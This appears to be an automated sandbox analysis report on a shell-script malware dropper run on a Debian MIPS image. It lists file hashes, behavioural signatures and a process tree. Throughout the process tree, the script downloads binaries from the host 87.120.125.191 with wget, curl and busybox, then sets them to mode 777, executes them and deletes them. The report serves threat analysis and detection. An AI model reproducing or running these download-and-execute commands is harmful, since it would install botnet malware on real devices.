Analysis
-
max time kernel
134s -
max time network
139s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
21/11/2024, 04:06
Static task
static1
Behavioral task
behavioral1
Sample
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh
-
Size
10KB
-
MD5
2c8ee73ff481383ca124810fef8653b1
-
SHA1
2f0045a1346635e0b97b189a217d60329572ee9c
-
SHA256
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94
-
SHA512
a4cf9a0c5f3fcb4bbc802490023c07e2cdfe73a8a6d3d4903e7e952967325270f6f4a0bf912b58844b8655e30ba7832a39dc377a73ed4443b77740b6584ad8ad
-
SSDEEP
192:mrPM5ZTjn81dBLvdLvgaD6DGDN2uVFxFxFcj/flNzu7ui07gQ27wgRNKW5z7MUzm:jiC2N2uKu4OxTHC2N2uwCo
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 821 chmod 935 chmod 965 chmod 893 chmod 917 chmod 923 chmod 827 chmod 971 chmod 977 chmod 782 chmod 847 chmod 871 chmod 905 chmod 911 chmod 929 chmod 734 chmod 749 chmod 803 chmod 833 chmod 941 chmod 881 chmod 947 chmod 953 chmod 959 chmod 762 chmod 899 chmod 743 chmod 887 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY 736 jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD 744 vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa 750 vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx 763 I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL 783 MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I 805 zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo 822 ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa 828 YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a 834 Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp 848 MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR 873 Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p 882 hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA 888 W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY 894 RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo 900 ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa 906 YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a 912 Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp 918 MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR 924 Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p 930 hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA 936 W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY 942 RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY 948 jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD 954 vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa 960 vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx 966 I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL 972 MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I 978 zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD curl File opened for modification /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo curl File opened for modification /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa curl File opened for modification /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p curl File opened for modification /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA curl File opened for modification /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY curl File opened for modification /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD curl File opened for modification /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY curl File opened for modification /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY curl File opened for modification /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa curl File opened for modification /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx curl File opened for modification /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY curl File opened for modification /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL curl File opened for modification /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I curl File opened for modification /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a curl File opened for modification /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp curl File opened for modification /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR curl File opened for modification /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I curl File opened for modification /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR curl File opened for modification /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa curl File opened for modification /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo curl File opened for modification /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa curl File opened for modification /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a curl File opened for modification /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx curl File opened for modification /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL curl File opened for modification /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p curl File opened for modification /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA curl File opened for modification /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp curl
Processes
-
/tmp/2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh/tmp/2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh1⤵PID:707
-
/bin/rm/bin/rm bins.sh2⤵PID:712
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵PID:715
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:721
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵PID:731
-
-
/bin/chmodchmod 777 jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵
- File and Directory Permissions Modification
PID:734
-
-
/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY./jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵
- Executes dropped EXE
PID:736
-
-
/bin/rmrm jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵PID:737
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵PID:739
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:741
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵PID:742
-
-
/bin/chmodchmod 777 vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵
- File and Directory Permissions Modification
PID:743
-
-
/tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD./vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵
- Executes dropped EXE
PID:744
-
-
/bin/rmrm vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵PID:745
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵PID:746
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:747
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵PID:748
-
-
/bin/chmodchmod 777 vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵
- File and Directory Permissions Modification
PID:749
-
-
/tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa./vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵
- Executes dropped EXE
PID:750
-
-
/bin/rmrm vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵PID:751
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵PID:752
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:753
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵PID:759
-
-
/bin/chmodchmod 777 I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵
- File and Directory Permissions Modification
PID:762
-
-
/tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx./I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵
- Executes dropped EXE
PID:763
-
-
/bin/rmrm I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵PID:766
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵PID:767
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:772
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵PID:779
-
-
/bin/chmodchmod 777 MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵
- File and Directory Permissions Modification
PID:782
-
-
/tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL./MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵
- Executes dropped EXE
PID:783
-
-
/bin/rmrm MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵PID:786
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵PID:787
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:792
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵PID:801
-
-
/bin/chmodchmod 777 zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵
- File and Directory Permissions Modification
PID:803
-
-
/tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I./zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵
- Executes dropped EXE
PID:805
-
-
/bin/rmrm zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵PID:810
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵PID:811
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:817
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵PID:820
-
-
/bin/chmodchmod 777 ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵
- File and Directory Permissions Modification
PID:821
-
-
/tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo./ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵
- Executes dropped EXE
PID:822
-
-
/bin/rmrm ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵PID:823
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵PID:824
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:825
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵PID:826
-
-
/bin/chmodchmod 777 YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵
- File and Directory Permissions Modification
PID:827
-
-
/tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa./YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵
- Executes dropped EXE
PID:828
-
-
/bin/rmrm YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵PID:829
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵PID:830
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:831
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵PID:832
-
-
/bin/chmodchmod 777 Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵
- File and Directory Permissions Modification
PID:833
-
-
/tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a./Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵
- Executes dropped EXE
PID:834
-
-
/bin/rmrm Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵PID:835
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵PID:836
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:837
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵PID:844
-
-
/bin/chmodchmod 777 MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵
- File and Directory Permissions Modification
PID:847
-
-
/tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp./MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵
- Executes dropped EXE
PID:848
-
-
/bin/rmrm MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵PID:851
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵PID:852
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵PID:868
-
-
/bin/chmodchmod 777 Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR./Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵PID:876
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵PID:877
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:879
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵PID:880
-
-
/bin/chmodchmod 777 hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p./hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵
- Executes dropped EXE
PID:882
-
-
/bin/rmrm hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵PID:883
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵PID:884
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵PID:886
-
-
/bin/chmodchmod 777 W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA./W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵PID:889
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵PID:890
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵PID:892
-
-
/bin/chmodchmod 777 RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵
- File and Directory Permissions Modification
PID:893
-
-
/tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY./RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵
- Executes dropped EXE
PID:894
-
-
/bin/rmrm RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵PID:895
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵PID:896
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:897
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵PID:898
-
-
/bin/chmodchmod 777 ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo./ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵PID:901
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵PID:902
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵PID:904
-
-
/bin/chmodchmod 777 YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa./YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵
- Executes dropped EXE
PID:906
-
-
/bin/rmrm YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵PID:907
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵PID:908
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵PID:910
-
-
/bin/chmodchmod 777 Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a./Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵PID:913
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵PID:914
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵PID:916
-
-
/bin/chmodchmod 777 MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵
- File and Directory Permissions Modification
PID:917
-
-
/tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp./MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵
- Executes dropped EXE
PID:918
-
-
/bin/rmrm MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵PID:919
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵PID:920
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:921
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵PID:922
-
-
/bin/chmodchmod 777 Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵
- File and Directory Permissions Modification
PID:923
-
-
/tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR./Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵
- Executes dropped EXE
PID:924
-
-
/bin/rmrm Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵PID:925
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵PID:926
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵PID:928
-
-
/bin/chmodchmod 777 hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵
- File and Directory Permissions Modification
PID:929
-
-
/tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p./hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵
- Executes dropped EXE
PID:930
-
-
/bin/rmrm hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵PID:931
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵PID:932
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵PID:934
-
-
/bin/chmodchmod 777 W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵
- File and Directory Permissions Modification
PID:935
-
-
/tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA./W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵
- Executes dropped EXE
PID:936
-
-
/bin/rmrm W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵PID:937
-
-
